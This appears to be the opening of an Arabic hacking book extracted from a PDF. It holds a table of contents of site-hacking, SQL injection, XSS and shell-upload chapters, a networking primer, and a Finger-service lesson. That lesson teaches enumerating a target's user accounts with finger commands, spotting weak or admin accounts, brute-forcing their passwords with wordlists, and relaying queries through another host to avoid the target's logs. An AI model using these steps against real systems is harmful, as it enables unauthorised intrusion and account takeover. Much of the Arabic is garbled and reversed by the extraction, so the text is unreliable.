book of hackerz ... 500 pages

1

Tips Club

المكتبة العربية

http://www.TipsClub.com/

2

7......................................................................................مقدمة

:قسم الشبكات 9...............................................................................الھاكرز والكراكرز

11.....................................................................ملف عن الشبكات Finger...........................................................................19خدمة FTP................................................................................27ماھو

FTP?.......... .................................................30ماھو نقل الملفات

Idiots4 IP /TCP36....................................................... الجزء األول

TCP/IP 4 Idiotsجزء الثاني .......................................................50

Idiots 4 IP /TCP61..................................................... الجزء الثالث

Idiots 4 IP/TCP67.......................................................الجزء الرابع HTTP.............................................................................76ماھو

84............................................... .)الجزء االول (IP/TCP بروتوكول 88.......................................... ....)الجزء الثاني (IP/TCP بروتوكول 92......................................... .....)الجزء الثالث (IP/TCP بروتوكول 97....................................... .........)الجزء الرابع (IP/TCP بروتوكول 104.......................................)-1- الجزء الخامس (IP/TCP بروتوكول 108.......................................)-2- الجزء الخامس (IP/TCP بروتوكول

116................................................. تحت المجھرHTTPبروتوكول ال CGI.............................................................................119ماھو Buffer Overflows..........................................................121ماھو

BOF..........................................................................126دراسة

3

Send Mail..................................................................130ماھو

3POP.........................................................................134ماھو

137........................................................................ماھو التلنت

DNS..........................................................................144ماھو

IP.............................................................................148ماھو

WAP(..... ..............................153(بروتوكول االستخدام الالسلكي 156.............................................................الشبكات الالسلكیة

ssh....................................................181 برتوكول القشرة االمنة 182............................................................الجزء األول Ssl شرح 184................................................................الجزء الثاني Ssl شرح

Socks.........................................................187 ما ھو بروتوكول 190............................................102توصیل االنترنت بنايل سات

4

:سم الحمايةق 194 ..........................)1(المخاطر األمنیة على شبكة الويب والوقاية منھا 196 ..........................)2(المخاطر األمنیة على شبكة الويب والوقاية منھا

199...................................................................السرية في االنترنت 202.......................................ھل يمكن أن تتجول متخفیا في االنترنت؟

htaccess..........................................................................203ملف 920....................................................................أساسیات التشفیر

213............................................. عنك؟اماذا تعرف المواقع التى تزورھ 216...........لحل كثیر من المشاكل االمنیة على الشبكة Isa شرح وظیفة

222..............................................................ماذا يعرف عنك المزود؟ 224.......................................................بي نمبر؟ماذا يكشف رقم اال

StealthZapper 225..........................لمسح تحركاتك من على السیرفر 232..........................شرح طريقة استرجاع المنتدى بعد اختراقه بالصور

238.....................................................!!كیف تبقى مجھول الھوية ؟ 243.....................................................!!كیف تبقى مجھول الھوية ؟

249................................................................طرق حمايه المنتدى

:قسم االختراقanonymous Access..............................................................257 FTP........................................................259الختراق عن طريق ال

263.......................................................االختراق عن طريق التلنت 266......................................................................اختراق المواقع

279........................................... ........)الجزء االول(كیفیة االختراق 286........................................ .........)الجزء الثاني(اختراق المواقع

293..............................................................اختراق موقع مجانيFrontPage Extension...........................................................296 asp. philboard......................................303اختراق المواقع من نوع

307......................................................................تعلم االختراق

5

319....................................................................اختراق المواقع IIS........................................326الدلیل الكامل الختراق سیرفرات

332.......................المشھوره مع نموذج عملي php شرح لثغرات ال

340.........................................................ح ثغرة سجل الزوارشر 344...................اختراق الديجي شات احدث الطرق لتخطى الحماية

354.........................................شرح تخطي مجلد الحمايه لألدمن

356..عیله على السیرفرالسیف مود ما ھو وكیفیفة تخطیه وكیفیة تف

Exploiting Cisco Systems.................................................360

NetCat (....... ............377(اختراق السیرفرات عن طريق النت كات 387....................................................ماھو االختراق العشوائي

SQL Injection.................................391 ثغرات الـكیفیة اكتشاف phpshell (..................... ..........................................400(تعلم

411...........................أخذ رووت+ طريقة البحث عن األكسبلويتات xss............................................................416 استغالل ثغرات

,, .0 1ALog v4S422........................لوج خفیف و دون قاعدة بیانات 425.. وماتحت2.0.3من Invision Power Board اكتشاف ثغره حديثه

428.....................................شرح احدى ثغرات الصندوق السحري 435......................................نتدي مخترقم طريقة رفع الشل في

438........................................ بالصور Add Admin.4 7Nukeشرح

WebHints ...........................................443 كیفیة استغالل ثغرة

6

:قسم االدوات والمهارات 448........................مة التشغیلأساسیات إكتشاف وإستغالل ثغرات أنظ

461.................................................................دراسة موقع الضحیة

465...اتخالص اكبر قدر ممكن من المعلومات عن الموقع من خالل الدومین467.............................................................Remote OS Detection

PHP................................................................................482أداة 488..............................................................ھل تريد شالااا حقیقیا

490..................تعلم كیفیة ترجمة الثغرات بلغة البیرل مع تطبیق عملي

496......................................................ارسال رسالة مزيفة بالتلنتNetwork Sniffing...................................................................503

506.....................................................شرح تفصیلى للكوكى اديتور nmap.................................................................511شرح برنامج Shadow Security Scanner....................................534 شرح برنامج

:االقاموس والمصطلحاتقسم 538................................................................................قاموس

568..................................................................مصطلحات شائعة

7

بسم اهللا الرحمن الرحیم وبعد

أحمد اهللا تعالى على إتمام ھذا الكتاب والذي يضم أھم المواضیع في األقسام ةالتالی الشبكات -1 الحماية -2 إختراق المواقع -3 أدوات ومھارات -4 القاموس والمصطلحات المنتشرة -5

ولم أغفل , وتم وضع الكتاب لجمیع المستويات من الصفر حتى اإلحتراف

.المواضیع الشیقة أو القديمة األساسیة والتى أعتقد أن يكون لھا نفع للقارئعض المواضیع لم أجد لھا وب, ونأسف لوجود بعض األخطاء في كتاب المواضیع

.كاتبويعلم اهللا كم استنفذ ھذا الكتاب مني من جھد ومشقة ولكن كل ما أريده ھو

رحمه اهللا وأسكنه )BrUtE HaCk(ألستاذي دعوة صالحة في ظھر الغیب .فسیح جناته فقد كان عونا لى دائما .ودعوة لي بالتوفیق في ھذه الحیاة

واهللا من وراء القصد, الفائدة وأرجوا نشر الكتاب حتى تعم com.hotmail@2003Egypt_Mega وأي استفسار أرجوا إرساله على

.وشكرا مع تحيات

Mega Egypt فريقو

BrUtE HaCk

9

الھاكرز والكراكرز

Mega Egypt:للكاتب

لمن تطلق كلمة ھاكر؟كان في اواخر الستینات تطلق كلمة ھاكر على المحترفین في البرمجة في

تران ثم تحولت الى المخترقین والمخربین لغات ذلك الوقت كالبیزك والفرو . وجدت شھرة أكبر عند بداية ظھور الفیروسات والديدان

من ھو الھاكر؟

شخص له القدرة كذلك على دخول االجھزة المبحرة في عالم االنترنت ويستطیع كذلك تأمین الشبكات وحل مشكالت الشبكة له القدرة على البرمجة

. ASPأو Perl أو PHP أو C لغة أو اساسیات البرمجة مثل

من ھو الكراكرز؟شخص لديه القدرة على البرمجة ويستطیع اختراق االجھزة للحصول على

معلومة سرية أو اختراق مزودات الشركات الضفة او خذف شئ ما وكذلك كسر الشفرات ووفكھا وبقدرته على البرمجة يستطیع تطوير أدواته لتناسب كل

.الظروف

الھاكرز؟أنواع .ھم الذين يخترقون بأوامر من سلطات: القبعات البیضاء – )1(ھم باختصار يؤمنون بحرية المعلومات فھم : القبعات الرمادية – )2(

.يخترقون لمعرفة نقاط الضعف أو المن الشبكاتيخترق اما للحصول على معلومة معینة لتجارتھا أو : القبعات الوداء – )3(

.للحصول على المال :نواع أخرى من الھاكر ھناك أ

)1( – Phreak : ھو ھاكر يستطیع التجسس على المھاتفات أو الدخولعن طريق الشبكات الھاتفیة ويتخدمون تقنیات عالیة وأجھزة كأجھزة

...التحكم في موجات اصوت)2( – Cypherpunks : ھو ھاكر يستطیع التشفیر إما عن طريق البرامج أو

.لصعب جدا فك ذلط التشفبرإستخدام خوارزمیات معقدة فمن ا)3( – Cyberpunk : ھو ھاكر يستطیع استخدام مزيجا من الطرق السابقة

. النوع من الھاكر يستطیع القرصنة على القنوات الفضائیةوھذا

10

)4( – Spoofing : ھذا النوع من الھاكر يستطیع ارسال رسائل مزيفة ).اسووردالیوزر نايم والب(فیدعي أنه شركة معینة فیحصل على مايريد

)5( – IP Spoofing : ھاكر يستطیع إعطاءIP وھمي لخداع المزودات .الخدمة فیصعب تحديد مكان الجھاز

)6( – Web Spoofing : يستطیع تصمیم موقع مشابه لموقع اخر معین .فیخدع المستخدم في ھذا الموقع فیاخذ الھاكر ما يريد

)7( – Nuking : ع من الحزم وھي عمیة ارسال قنابل بريدية أو ارسال نو .ألى شبكة عینة فتحدث أضرار

12

) Network(الشبكة زات الطرفیة الشبكة ھي نظام اتصاالت يقوم بربط عدة حواسیب والتجھی

المرافقة بعضھا ببعض بصورة مشابھة نوعا م للشبكة الھاتفیة بھدف تقديم .الخدمات الحاسوبیة المختلفة للمثتثمرين

تشیر إلى أثنین أو أكثر من أجھزة الحاسب متصلین ) Network(كلمة شبكة : وھناك عدة أسباب لربط أجھزة الحاسب فى شبكة أھمھا ما يلي . معا اتصال أجھزة الحاسب يسمح باتصال األشخاص ونقل ·

.المعلومات .اتصال أجھزة الحاسب يسمح بمشاركة موارد الحاسب ·

:ھناك ثالث انواع شبكات الحاسب )Local Area Networks( الشبكات المحلیة

بطريقة مباشرة باستخدام نوع معین وفیه يتم ربط الحاسبات ) LAN( وتختصر كم و 2 5.وھي شبكة بین عدة اجھزه التذيد المسافة بینھا عن , من الكابالت

و ھو ..تستخدم في المؤسسات و الشركات فیمكن ربط االجھزة و الطابعات .من اكثر الشبكات انتشارا و استخداما

)Wide Area Networks( الشبكة الواسعة

وھو ينتج عادة من ربط عدة شبكات محلیة ببعضھا من خالل ) WAN( وتختصر و ھي شبكة كبیره , خطوط التلیفون أو بواسطة القمر الصناعي أو المیكروويف

و تعتبر العمود الفقري لشبكة االنترنت ,كم 50يمكنھا ربط اجھزه على مسافه دينة او حیث انھا تستطیع ربط شبكات محلیة مع بعضھا مما يمكنھا لتغطیة م

..دولة

)Metropolitan Area Networks( شبكات المدن 35و ھي شبكة بین حاسبات عديدة اقصى مسافة لھا ) WAN )وتختصر الى

..كم و يمكن لھا ربط فروع شركة او شبكة بین حواسیب شارع معین

اھمیة استخدام الشبكات .ومات المشاركة في استخدام البیانات و المعل-1

13

. المشاركة في استخدام الكونات المادية و البرامج -2 -: المشاركة في استخدام البیانات و المعلومات -1حیث يكون من اسھل تبادل البیانات بعد تشبیك االجھزة بدال من استخدام

فیمكن الي شخص على الشبكة ان يسحب ملف معین و , الديسكات في ذلك فالشبكه تسھل تبادل البیانات كما - ن سمحت له بذلك و قد تكو- مجلد كامل

.لو انك تتعامل مع جھاز واحد فیتم تبادل البیانات بسھوله و سرعة . المشاركة في استخدام الكونات المادية و البرامج -2فیمكن اليشخص على الشبكة ان يستخدم , وھي من اعظم فائد الشبكة

جھاز اخر على نفس الشبكة مثال الطابعة التي موجوده على

-:ويمكننا ان نقول ان الشبكات تنقسم لقسمین Peer-To-Peer شبكات الند للند -1 Based-Server شبكات الخوادم -2 Peer-To-Peer شبكات الند للند -1

Serverمن المعروف دائما ان في جمیع الشبكات يوجد بما يسمى الخادم كات ال يوجد خادم و بالتالي فان جمیع االجھزة ولكن في ھذا النوع من الشب

مستوى -البیانات المتاحة ( تكون متساوية فكل مستخدم مسؤل عن جھازة .و يعرف كل جھاز من االجھزة المتصلة بالشبكة بالند .. ) التأمین

حیث ان ھذا النوع من Work groupsوتعرف ھذه الشبكات ايضا باسم صغیرة فجب ان تكون االجھزة المكونة للشبكة الشبكات يمثل مجموعة عمل

و من ھنا نستطیع ا نقول ان تكلفة ھذه الشبكات , اجھزة او اقل 10حوالي .. ) .ال حاجة لوجود خوادم ( قلیله اذا ما قورنت بالنوع االخر

Based-Server شبكات الخوادم -2

بمثل مدير والذي يكون وھذا النوع من الشبكات يحتاج لوجود خادم قويومن احد ممیزات ھذا النوع من . للشبكة و الذي يستطیع التحكم فیھا و احدى الممیزات االخرى ھي امكانیة , الشبكات ھو مستوى تأمینھا العالي

التحكم في النظام بحیث يقوم بعمل نسخة احتیاطیة تلقائیا كل مدة يحددھا ت المستخدمین لھا و ھذه الشبكة يمكن ان تتكون من مئا.صاحب السرفر

. فتعتبر مكافة اكثر من شبكات الند للند

14

Network Toplogyطبولوجیا الشبكة ونقصد بطبلوجیا الشبكة ھو تحديد المكونات المادية لھا و يمكن تقسیم

- :طبولزجیا الشبكات الى ما يأتي Star Toplogy الطبولوجیا النجمیة -1 plogyRing To الطبولوجیا الحلقیة -2 Mesh Toplogy الطبولوجیا الخیطیة -3 Hybrid Toplogy الطبولوجیا الھجینة -4 Bus Topology الطبولوجیا الخطیة -5 Star Toplogy الطبولوجیا النجمیة -1

Clientsوھي احد طرق الشبیك القديمة و التي يم فیھا توصیل كل االجھزة وھي ال ابسط الشبكات و تتمیز Serverالمكونة للشبكة بالخادم الرئیسي

بسھولة اضافة او ازالة اي شخص نت الشبكة دون التأثیر على ادائھا و لكن من Server اي خلل في الخادم لحد العیوب الرئیسیة بھا ھو انه عند حدوث

.يؤدي الى انھیار الشبكة بأكملھا لة بما يعرف ولكن قد تم تطوير طريقة وصل االجھزة بالخادم فاصبحت تكون متص

.. الكابل - فلو حدث اي عطل في احد االجھزة التي على الشبكة Hubب فسیتوقف عمل الجھاز على انه جزء من الشبكة ولكن سوف يستمر عمل

.الشبكة Ring Toplogy الطبولوجیا الحلقیة -2

فیتم وصل كل جھاز ) دائرة ( و تكون االجھزة المكونة للشبكة على شكل حلقة .Server فیتم وصل الجھاز االول و االخیر بالخادم جھاز الذي يلیهبال

و عند حدوث اي عطل في جھاز على , ويم وصل االجھزة بكابل دائري واحد .شبكة يؤثر على اداء الشبكة كلھا

ھو Token و Token Passingوتنتقل البیانات في ھذه الشبكة بطرقة تعرف بال في اتجاة واحد فقط بعني Tokenويتحرك ال , sBitعبارة عن سلسلة من ال

بمشي في اتجاه الجھاز الذي على يمینه و يوجد جھاز Tokenاذا كانت ال الیه Tokenعلى يسار ھذا الجھاز من المفترض وصول ال

. ال بتجه الى الیسار بل بدور في كل الشبكة حتى يصل الى ھذا الجھازان الجھاز الرسل يقوم بوضع مثل بريد الكتروني ويتم تبادل البیانات عن طلريق

على البیانات المرسله و يقوم ارسالھا و حتى تصل الى الجھاز و تطابق معه و من ثم يرسب الجھاز المسقبل الى . البريد االكتروني المرفق مع البیانات

.الراسل رسالة تدل على استقابلة للبیانات

15

logyMesh Top الطبولوجیا الشبكیة -3

وفیھا يتم ربط الجمیع اجھزة ببعضھا عبر عدة كابالت بحیث يمكن استمرار عمل الشبكة عند حدوث اي عطل في اي جزء فیھا فعند حدوث خلل في اي كابل

ولذلك فانھا مكلفة الى حد ما وذلك , يتم ارسال البیانات عبر كابل اخر .الستخدام عدد كبیر من الكبالت

Hybrid Toplogyجینة الطبولوجیا الھ-4

ويعتبر ھذا النوع من الشبكات مزيج او خلیط نوعین او اكثر من االنواع الربعة و يتم ذلك عن طريق وصل عدد من ال ) Mesh Topolgyباستثناء ( االخرى

Hubsلتكوين ھذه الشبكة المكون للشبكات االخرى . Bus Topology الطبولوجیا الخطیة -5

Trunk- جھزة في شكل خط مستقیم بكابل واحد يطلق علیه ويتم توصیل اال Backbon-Segment ويتم ارسال البیانات التي تكون على الشبكة تكون

فعد ارسال مثل ملف الى جھاز يتم ارساله , على شكل اشارات الكترونیة الى جمیع االجھزة التي على الشبكة على ھیئة اشارات الكترونیة معھا

ز مشفر وال يستقبل ھذا الملف اال الجھاز الذي يتطابق مع العنوان عنوان الجھل .المشفر

ولذلك اليمكن الكثر من جھاز ارسال واستقبال البیانات مما يؤثر على سرعة .واداء الشبكة

انواع كابالت التوصیل

من اھم مكونات الشبكة المادية ھي كبالت التوصیل بین االجھزه و التي يتم و يوجد االالف , الشارات االلكرونیة فیھا بین االجھزة المكونة للشبكة انتقال ا

االنوع من الكبالت حیث يمكنك اختیار الكبالت المناسبة لك حسب حجم ..الشبكة التي تريدھا و المتطلبات المختلفة

-: انواع رئیسیة 3ويمكننا تقسیم انواع الكابالت الى . Coaxial Cable الكابل المحوري -1 .Pair Cable-Twisted الكابل المزدوج الملفوف -2 .Optic Cable -Fiber كابل االياف الضوئیة-3 . Coaxial Cable الكابل المحوري -1

16

وھو من اكثر انواع الكابالت تداوال و يرجع ذلك الى ممیزاته العديدة مثل انه غیر , معه عند تركیبه مكلف فھو مناسب للشبكات الصغیرة كما انه سھل التعامل

من النحاس - او سلك -ويتكون ھذا الكابل من شئ شبیه بانبوبة غیر مفرغة و حولھا مادة عازلة و اخیرا غالف خارجي وفائدة العازل ھو حماية البینات التي

تنتقل عبر الشبكة من التشويش و الذي ينتج من وجود اشارات الكتورنیة .ات عبر الشبكة مشتته والتي تمنع انتقال االشار

وبعد توضیع اجزاء السلك سوفف نعرف فوائدھا فسلك النحاسي ھو المسؤل عن تنقل االشارات االكترونیه و العازل فائدة حماية االشارات االلكترونیة كما

.واحدى ممیزات ھذا النوع من الكابالت ھو مقاومة التشويش , ذكرنا من قبل

-:انواع الكابالت المحورية Thinnrt كابل رقیق -أ

Thicknet كابل سمیك -ب Thinnrt كابل رقیق -أ

-ھو احد انواع الكابالت المحورية و يتمیز بمرونته و خفة وزنه و سمكه الصغیر متر 180 و يمكنھا التصويل بین اجھزه اقصى بعد بینھا ھو سـم. 60حوالي

.تقريبا و بعدھا تضعف االشارات االلكترونیة

Thicknet كابل سمیك -بھو احد انواع الكابالت المحورية ايضا وكما يظھر من اسمه ان الكابل نفسه

سمیك و اكثر صالبة من النوع االخر و نتیجة لسمك الكابل السلك النحاسي اصبح اكثر سمكا و كنتیحه ايضا لذلك اصبح يمكنه توصیل االشارات االلتكورنیة

–یلو متر تصل الى نصف ك- لمسافة اطول Pair Cable-Twisted الكابل المزدوج الملفوف -2

ويتكون ھذا النوع من الكابالت في ابسط اشكاله من مجموعتین من االسالك فیتم جمع , االنحاسیة معزول كل منھم عن االخر و ملتف كل منھم حول االخر

من ھذه لتكوين الكابل ويوجد نوعین عدد من االسالك ووضعھا داخل الغالف -:الكابالت ھما

. pair-Unshielded Twisted(UTP( الكابل المزدوج المجدول -ا Pair-Shilded Twisted(STP( الكابل المزدوج المعزول -ب . pair-Unshielded Twisted(UTP( الكابل المزدوج المجدول -ا

17

كات وھو من اكثر انواع الكابالت انتشارا ويستخدم بشكل كبیر في الشب و يتكون من نوعین من االسالك النحاسیة الملتفین حول ) LAN( المحلیة

يعضھم و يتوقف عدد ھذه االتففات على الغرض الذي سوف يتم اسخدامه .فیه و لكن من عیوبه الكبیره ھي خاصیة التداخل

.ھو تداخل اشارات من كابل مع اشارات الكابل االخر : التداخل Pair-Shilded Twisted(STP(ج المعزول الكابل المزدو-ب

النحاسي ويتكون من مجموعتین من االسالك المجدولة و يتمیز بان غطاءهاال ان ھذا النواع من الكابالت ال يقتصر على , UTPافضل من نظیره في

الكابالت فقط للتشبیك بل يستدعي االمر الى استخدام بعض االجھزة االخرى . Optic Cable -Fiberاف الضوئیة كابل االلی-3

وھذا النوع يختلف تماما عن النوعین االخرين حیث ان البیانات تنتقل فیه على ھیئة نبضات الكتروينه ويتمیز بسرعه نقل البیانات و صعوبة سرقة البیانات من

قالب ) : من الداخل للخارج ( و يتكون ھذا الكابل من عدة اجزاء ھي .خالله فیتكون , طبقة حماية اخیره - ) او الزجاج ( بقة من البالسیتك ط- من الزجاج

اي كابل من مجموعتین من االلیاف الضوئیة مجموعة خاصة باالستقبال و .االخرى خاصة باالرسال

نقل االشارات االكترونیة

-:ھناك طريقتین لنقل االشارات االلكتروية عبر الكابل Basebandدي طريقة النقل ذات المدى القاع-1 Broadband طريقة النقل ذات المدى الواسع -2 Baseband طريقة النقل ذات المدى القاعدي -1

كھريبة وكلما كانت تنتقل عبر / وتنتقل البیانات فیه على ھیئة نبضات ضوئیة كابل طويل كلما ضعفت االشارة

ت للتقوية نفسھا و في حالو االضطرار الى استخدام كابل طويل يجب وضع ادواRepeaters و التي تعید ارسال

.االشارة الضعیفة بعد استقبالھا Broadband طريقة النقل ذات المدى الواسع -2

18

وتنتقل البیانات على موجات ضوئیة وكما ان نظام النقل ذو المدى القاعدي نجد ان نظام Repeatersيستخدم

.fiersampliالنقل ذو المدى الواسع يستخدم المكبرات

- :تلخیص الدرس االول تستخدم الشبكات في تسھیل تبدال البیانات و مشاركة ·

.الملفات ) . MAN- WAN -LAN ( يوجد ثالث انواع من الشبكات · كة البیانات و مشار: توجد فائدتان رئیسیتان للشبكات ·

.Hardware المعلومات و مشاركة االجھزة . اشكال لطبولوجیا الشبكات 5يوجد · االلیاف - المزدوجة - المحورية ( انواع للكابالت 3يوجد ·

) .الضوئیة , Baseband(رات االلكترونیة يوجد طريقتین لنقل االشا · Broadband(

19

Fingerخدمة

LAMeR :للكاتب

السالم علیكم ورحمة اهللا وبركاته

79التي تعمل على بورت Finger تقبلوا مني ھذا الدرس عن بروتوكول خدمة

بسم اهللا نبدأ الدرس

الدرس فھرس محتويات>================<

تبرئة1 1.

inger Fمقدمة عن1 2.

Finger استخدام1 3.

Finger بعض الخدع عند استخدام خدمة1 4.

Finger موقع بأستخدام األستعالم عن طريق1 5.

األستنتاج من ھذا الدرس1 6.

الختام1 7.

:تبرئة1 1.>=========<

ولیس للقیام بأعمال غیر شرعیة ھذا الدرس فقط للتعلیم .لھذا الدرس م السيءفالكاتب ال يتحمل اي مسؤولیة لالستخدا

Finger مقدمة عن1 2.>===================< عادة وكانت79ديمون خدمة تعمل عن طريق البورت Finger إن

.رقمي للناس businesscard مستخدمة أصال كنوعديمون Finger يمكن أن يرسل طلب إلى) remote user (المستخدم البعید

يجري على نظام معین .إجابة وسیحصل على) 79(نوعیةFinger بورت

20

ھذه اإلجابة ستخبرك من ھم المستخدمین على ھذا النظام و أيضا .المعلومات عن ھؤالء المستخدمین المتصلین بالنظام بعض

في أغلب األحیان اإلجابة تخبرك أيضا من الذي ,إضافة إلى ھذه المعلومات

.باإلتصال وكیف قام)admin (يدير النظام خدم الناس األتصال على جمیع انواع األنظمة في العالم وطلبقديما است

كان يعطیھم معلومات عن Finger األستعالم عن ھذه األنظمة و الـ Fingerوكان.في النظام وھل لھم حسابات في ھذا النظام من ھم الموجودون يستخدم قديما في

.الشركات الكبیرة أيضا الجامعات و

في الجامعات إستعمل عامة عن طريق الطالب Finger في الماضي ، الـ اذا ارادوا معلومات تخص طالب اخرين في نفس الجامعه

اي " Finger me " !بجملة Finger Deamon (اجابة(تكون األجابة وكثیرا ما " ! أعلمني"

Finger اآلن ومع وجود شبكة اإلنترنت العالمیة اصبح أما اآلن أقل شھرة ، ألنه توجد

رقمیة خاصة بمستخدمین )bisinesscard (الويب للعمل كبطاقة عملمواقع وبسبب مالحظة الناس األنترنت

Finger Deamon التھديد الواسع لألمن األلكتروني قل استخدام خدمة

على أية حال،تقدم ) األنظمة ) لیس كل األنظمة منعت ھذه الخدمة وستجد بعض المواقع

. ھذه الخدمة بأستخدام برامج م الھكرز بمحاوالت اختراق األنظمةوھذه األيام يقو

portscans بدون أي أساس علمي. . . للبحث عن البورتات المفتوحة . ديمون، مثال عظیم لخدمة Finger لذلك إن

بكمیة ضخمة من المعلومات الحساسة يمكن استخدامھا قانونیا لتزودك .حول ھدف

رس بلغة مفھومةالد لھذا سوف أحاول ان اشرح في ھذا مصلحتك ديمون وماذا يفعل وكیف يمكن استخدامه في Finger ما ھو

كانت قديما والزالت تستخدم لجلب Finger ان خدمة: الخالصة المقدمة المعلومات عن

21

ام المستخدمین الموجودين في النظام و ھل لديھم حسابات في ھذا النظام . ال

ھاز كمبیوتر تخزن فیه معلومات ھائلةھو ج ) server (النظام: مالحظة ويستخدم في استضافة المواقع

Finger استخدام1 3.>=================<

للبحث) superscan (المعروفة مثل عند استخدام اي من برامج السكان) بورت) Portووجدت به منفذcom .foobar.www:// http (مثال(في موقع معین

مفتوحا79 com.foobar.www:// httpانھذا يعني

.ديمون يعمل Finger له طلب استعالم؟)request (اآلن كیف نقوم بـ

وندوز عن طريق ) مركب Finger خاص للـ) client (في أغلب األحیان وندوز ال يوجدبه زبون

)installed

Finger كخادم لـ Telnet لذلك سوف نستخدم --توضیح--o) in Server(Finger Deamon> -------request--------) client(Telnet

) MS DOS: (عن طريق كتابة السطر اآلتي في موجة الدوس

79com .foobar.telnet www

. تطبع األوامر و منه telnet بعد ذلك سیظھر لك برنامج

اما من يونیكسبنظام لینوكس لسنا بحاجة إلى أن نستعمل تیلنت ألنه يوجد

Finger Deamon خاص بخدمة)tclien(زبون .تقريبا مركب على النظام بشكل دائم

22

==========================================|

|=========== سیكون الشرح التالي حتى نھاية الدرس لمستخدمي لینوكس ::: مالحظة|

| بأستخدام أما أذا قررت األستمرار ثم في التلنت وستكون كتابةوندوز ستكون كتابة األوامر في موجه الدوس|

| األوامر نفسھا األوامر التيفي www "مسافة ثم" نضع" @"تنكتب بأستخدام نظام لینوكس ولكن بدل |

| الوندوز مراعیا اسم الموقع : |لینوكس ھكذا مثال يكون كتابة األوامر في||com .anyname@finger| : |ولكن في وندوز سیكون ھكذا||com .nynamea.finger www| www |و finger الحظ المسافة بین|

==========================================|===========================================

|=======

L) unix shellفي محث األوامر في يونكس على افتراض انك تستخدم اطبعcom.foobar@finger

ھنا ھو) مستخدمینه نه معرفة من ھمالموقع المرادم(الحظ ان الھدف com .foobar.wwwكمثال

:فستظھرالنتائج

:Where: When: Idle: Tty: Name: Login

com.foobar.3ls0 node10:13d Tue 17root foobar sys console >.......> <.......> <.......<Amos Amanda

Anderson Kenneth Bright Adrian

Doe John >.......> <.......> <.......<n Peter Johnso

Mitnick Kevin

23

Munson Greg Orwell Dennis

اآلن ماذا تعني ھذه النتائج؟) Name (نرى أسماء المستعملین وفي الثاني ) login(في العمود األول

،"األسماء الحقیقیة" .بالطبع لیست حقیقیة، لكن في معظم الوقت حقیقة التي

the terminal type النوع الطرفي) Tty(الثالثيرينا العمود

the idle time.فترة التوقف) Idle (والرابع وبعد ذلك في العمودين الخامس والسادس

.الحساب لألتصال بالنظام الوقت والمكان الذي استخدم فیهالخ الخاصة بمستخدمین .. أحیانا توجد أعمدة بعنواوين األيمیالت وأرقام ھواتف

امھذا النظ

بیتر ) Johnson Peterمستخدم معین إذا كنت تريد المزيد من المعلومات عن جونسن

:التالي أدخل األمر) على سبیل المثال

com.foobar@finger johnson

Finger استخدام خدمة بعض الخدع عند1 4.>====================================<

Finger .یسي لخدمةما الضعف الرئ أتمنى اآلن شاھدتFinger deamon النظام يريك ماھي الحسابات الموجوده على.

من المجموعة السحرية % 50) عن طريق قانوني (ھذا يعني أنك تكسب وھي

مجموعة أسماء المستخدمین التي ستمنحك الدخول/كلمات السر)Access(نظام إلى .

24

ة متوقفه على برنامجإذا عرفت أسماء المستخدمین، ستكون الخطوة القادمbruteforce أو

worldist password cracker بمعنى آخر برامج تخمین الباسوورد

ھناك سكربتات خاصة كتبت للتیلنت على سبیل المثال أو ابحث عنcom.thehackerschoice.www:// http /اذھب لموقع

pl.s pwscan'VLAD

او ) word (في ملف نصيعلیك ان تكون قائمة بكلمات السر لذلك يجب المفكره

كلمات السرقريبة من أسماء المستخدمین وإذا لم تعمل وحاول ان تكون القائمة

أنصحك بھذا الوقت ان تحظر لك كأس شاھي bruteforce -استخدم برنامج وتأخذ لك استراحة

-البرنامج يعمل عمله وتجعلغیرھا من میة منبالطبع نجد بعض الحسابات للمستخدمین للنظام اكثر اھ

.الحساباتتعرف بسبب انه عندما)root (أو الجذر) Admin (وخاصة حساب اإلدارة الباسوورد الخاص بھم

سھلة تخمین كلمة وبالطبع بعض الحسابات. وقتھا تستطیع التحكم بالموقع . السر

المثال على سبیل. ھناك بعض الخدع لمعرفة ھذا النوع من الحسابات :إطبع األمر

com.foobar@finger secret

سیعطیك جمیع الحسابات Finger Deamon األمر الي عندما ترسل ھذا

.أما في اسم المستعمل أو اإلسم الحقیقي" secret "التي تحتوي على كلمة أو" test "يمكنك أن تستعمل اذا، ماھو الشي المھم في ھذا؟ حسنا أنت

" temp" 0000"أو" المحتمل ان يكون ھذاالنوع من الحسابات ا تعرف منوكم" secret "بدال من

.األحیان سھل معرفة باسوورداته في أغلب

[email protected]

25

com.foobar@0finger

!األوامر وشاھد ما يحدث جرب ھذه

!بنفسك وأوجد خدعك RFC، أقرأFinger Deamon حاول التعرف على Fingerاألستعالم عن طريق موقع بأستخدام51.

>======================================<

ولكنھا تأتي " ألمس"كفعل Finger معنى Finger )استخدم خدمة إذا أردت ان ("استعلم" ھنا بمعنى

"com.victim.www"واألستعالم عن موقع معین مثل ھذا تعمل، Finger يقدم خدمة" com.host.www "موقع آخر وأيضا تعرف أن (ھذا اكتب في محث األوامر مثل:(ھذا ني ان أقدم طلبا مثلعندھا يمكن

[email protected]@finger

com .Hostيستعلم) Finger (اآلنcom . victimويريك النتائج .

com. victimأحدالفوائد من ھذه الطريقة انك ستكون مجھول لدى com.victim. wwwفعندما تقوم

في سجالتھم، بدال منكcom .host. wwwستشاھدlog (الدخول(بطلب سجل .

عن طريق خدمة( يقوم ) موقع Host )فائدة اخرى وھي أنك يمكن ان تترك)Finger باألستعالم عن حاسوبا

بینما اذا طلبت انت ھذا األستعالم بأستخدام خدمة آخرا على نفس الشبكة ،Finger من جھازك

المستعلم عنهلك ألنك سأكون غیر موثوق به لدى لن تكون مسموحة . عن طريق موقع Finger باستخدام بعكس اذا كان الطلب لألستعالم

األستعالم عنه يعتبر حاسوبك الشخصي ان الموقع الذي تريد: يعني الخالصة

غیر موثوق به بعكس .! طريق موقع اخر يشابھه فسوف يسمح له اذا كان األستعالم عن

26

الدرس األستنتاج من ھذا61.>=======================<

Finger Deamon معلومات ضخم ألي واحد يحاول يمكن أن يكون مصدر .إلى نظام) access (كسب الدخول

Finger deamon قانونیا يزودك بنصف كلمات السر واسماء المستخدمین access .التي تحتاجھا لكسب الدخول

ث عنھاھناك بضعة خدع لطیفة تمكنك من معرفة حسابات خاصة تبح لھذه الحسابات تستطیع كسر الباسووردات ، بإستعمال تقنیة من معرفتك

wordlist أو. bruteforce Finger deamon أيضا بأستعمال"األستعالم عن طريق موقع"تذكر فوائد

الختام1 7.>=========<

الدرس اتمنى األستفادة لمن قرأ ھذا وانشاهللا ما أكون طولت علیكم في الشرح

مسلم وترا حقوق النشر لكل

27

FTPماھو

ABDO_KING:للكاتب

